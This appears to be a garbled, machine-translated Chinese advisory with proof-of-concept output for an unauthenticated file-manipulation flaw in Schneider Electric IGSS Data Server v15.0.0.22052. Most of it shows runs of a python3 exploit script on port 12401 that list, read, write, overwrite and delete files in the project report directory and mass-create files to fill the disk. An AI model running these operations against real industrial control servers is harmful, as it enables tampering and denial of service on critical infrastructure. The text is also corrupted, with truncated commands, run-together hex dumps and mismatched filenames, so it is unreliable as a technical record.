可点名发现Schneider电码IGSS数据服务器 v15.0.022052
非认证远程攻击者可操作IGSS项目报表目录中文件攻击者可以在目录中列行、读取、删除并写文件写文件命令攻击者可修改现有文件内容并创建大量新文件以导致拒绝服务条件(即文件系统填充)。
列表文件 :
ython3igs_dataser
P12401列表*.*s:00000: 00000050000001000033230323331392E4C4F470000002202319000000000000000000000000000000000100003323232323232302E4C4F470000002202320.LOG00000000000000000000000000000000000000000000005000000100003323232322E4F47000022023000C0:000000000000000000000000000000000000000000.snip.
读文件 :
ython3igs_dataser
p 12401读F22022319.LOG读220222319.LOGIGS项目报表目录s:00000:000000000000000000000EC0F00170AAC068060303035.h.00500020:302D302D582D502D312D303000001 0000B8748E728D8012075D390..7B601E0000.snip.
创建新文件列表读取
ython3igs_dataser
P 12401写-f测试.txt写128随机字符测试.txts:0000:01 000050000000000000000000000000000000000000000000000000ython3igs_dataser
P12401列表*.txts:00000: 000000500000010000765732E7478700000000000000000000000000000001 000000000000000000000000000000000000000000000000000000000000000000000000000000000000ython3igs_dataser
-p 12401读-f测试.txt阅读测试.txts:00000:000000940000000000000000010: 80 00 00 00 39 50 4E 36 32 47 34 44 35 4F 39 4E ....9PN62G4D5O9N 00000020: 4E 32 4F 56 33 41 42 46 4A 55 53 49 56 58 31 38 N2OV3ABFJUSIVX18 00000030: 45 57 58 37 4E 4D 54 4D 56 50 38 4F 49 57 53 46 EWX7NMTMVP8OIWSF 00000040: 59 4C 41 31 4F 39 36 41 47 56 41 39 54 58 34 32 YLA1O96AGVA9TX42 00000050: 42 34 48 48 4F 50 48 30 37 47 55 50 41 39 4B 34 B4HHOPH07GUPA9K4 00000060: 52 53 42 48 44 55 36 44 34 4B 5A 4D 58 54 31 45 RSBHDU6D4KZMXT1E 00000070: 32 33 42 49 4B 53 5A 31 33 49 33 53 54 32 31 42 23BIKSZ13I3ST21B 00000080: 4E 31 44 4C 51 31 33 38 5A 30 36 4D 36 49 36 38 N1DLQ138Z06M6I68 00000090: 31 30 36 53 01 00 00 00 50 00 00 00 00 00 00 00 106S....P.......000000000000000000000C0:0000000000000000000000000000000000000E0:000000
修改现有文件 :
ython3igs_dataser
P 12401写-f测试.txt-s 256写256随机字符测试.txts:0000:01 000050000000000000000000000000000000000000000000000000ython3igs_dataser
-p 12401读-f测试.txt阅读测试.txts:00000:000000140100000000000000010: 00 01 00 00 44 44 59 32 37 54 45 43 31 59 55 51 ....DDY27TEC1YUQ 00000020: 42 56 32 30 34 30 4B 53 45 45 45 45 32 31 54 54 BV2040KSEEEE21TT 00000030: 33 36 48 46 4D 45 38 5A 4B 31 51 51 45 37 38 58 36HFME8ZK1QQE78X 00000040: 4C 32 30 46 45 45 4F 33 46 36 58 51 4E 37 50 37 L20FEEO3F6XQN7P7 00000050: 38 39 4A 50 4C 43 4A 43 48 57 53 30 4B 34 4C 4D 89JPLCJCHWS0K4LM 00000060: 55 4E 42 52 4A 54 50 56 37 59 37 45 57 50 54 49 UNBRJTPV7Y7EWPTI 00000070: 4B 50 33 4E 39 47 30 36 42 59 39 58 46 55 53 32 KP3N9G06BY9XFUS2 00000080: 38 44 4E 39 30 45 54 4A 38 36 45 54 46 58 45 5A 8DN90ETJ86ETFXEZ 00000090: 39 4A 47 4D 39 43 4D 35 53 5A 41 38 59 35 35 5A 9JGM9CM5SZA8Y55Z 000000A0: 53 38 55 43 4A 36 54 35 30 58 52 4C 34 32 43 34 S8UCJ6T50XRL42C4 000000B0: 4E 48 54 50 4F 45 32 54 44 51 46 37 48 52 37 53 NHTPOE2TDQF7HR7S 000000C0: 4D 49 5A 58 48 30 30 55 38 43 56 36 32 51 5A 5A MIZXH00U8CV62QZZ 000000D0: 42 49 49 39 36 4A 31 37 52 53 35 4F 44 44 53 58 BII96J17RS5ODDSX 000000E0: 43 37 50 34 42 47 47 54 52 4A 34 50 51 47 57 41 C7P4BGGTRJ4PQGWA 000000F0: 4B 57 30 42 32 56 41 57 42 5A 30 55 43 4F 33 48 KW0B2VAWBZ0UCO3H 00000100: 4E 4A 42 41 50 33 46 36 30 36 32 49 37 49 43 42 NJBAP3F6062I7ICB 00000110: 37 50 35 46 01 00 00 00 50 00 00 00 00 00 00 00 7P5F....P.......000120:000000000000000000000000001000000100000010000160:000000
删除现有文件
ython3igs_dataser
-p 12401删除-f测试.txt删除测试.txts:0000:01 000050000000000000000000000000000000000000000000000000ython3igs_dataser
P12401列表*.txts:0000:01 000050000000000000000000000000000000000000000000000000
创建x数y大小文件
ython3igs_dataser
P12401写-c10-s200向IGSS项目报表目录中UT44M7H9E2.XXX写200随机字符向IGS项目报表目录中 K0LKRKJPC.XXX写二百个随机字符写200随机字符到IGSS报表目录写200随机字符0G36NPJMQQ.XXXIGSS项目报表目录写200随机字符QWO1W6GKTI.XXX向IGS项目报表目录中的 6VZSSN5RHF.XXX写200个随机字符写二百个随机字符HCGPNN71.XXX向IGS项目报表目录LF54X9U6JA.XXX写200个随机字符写二百个随机字符5KYWNKX9V.XXX写200随机字符5DVH68B2K0.XXXIGSS项目报表目录ython3igs_dataser
P12401表xxxxs:00000: 000000500000010000304733364E504A512E5858000G36NPJMQQ00000000000000000000000000000000010000330-30554D4E3958372E58580000100N9X74.XXX00000000000000000000000000000000000000000000005000000100005000B0:3544564838324B302E 5858005DVH68B2K0.XXX000C0:000000000000000000000000000000000000000000000F0:00 00005000000100005000100:354B4559574B58392E585858005KYWNKX9V.XXX0000100000120:000000000000000000000000001000000100000150:36565A534E3548482E5858000VZNSN5HF.XXX000160:0000000000000010000001000000000000000000000001A0:484351504E37312E585800HCGNNN71.XXX00000000001C0:00 00000000000000000000010000000000010000001F0:4B304C524B4A50522E585800K0KRKJPC.XXX000000000000000000000000230:000000000001000000240:4C46355839554A412E 585800LF54X9JA.XXX00/00:00000000000000000000270:0000000000000000280:000000000001000000290:51 574F315736474B542E5858800QWO1W6GTI.XXX0000000000000000002C0:000000000000000000000000002D0:00 0000500000010000002E0:55 543444D37483932E585800UT44M7H9E2.XXX00002F0:00 0000000000000000000000300:00000000000000310:0000000000000000000000000000320:010000000000000000000000330:0000000000000000000000000000340:0000000000000000000000000000500:00 00000000000000000000000360:000000000000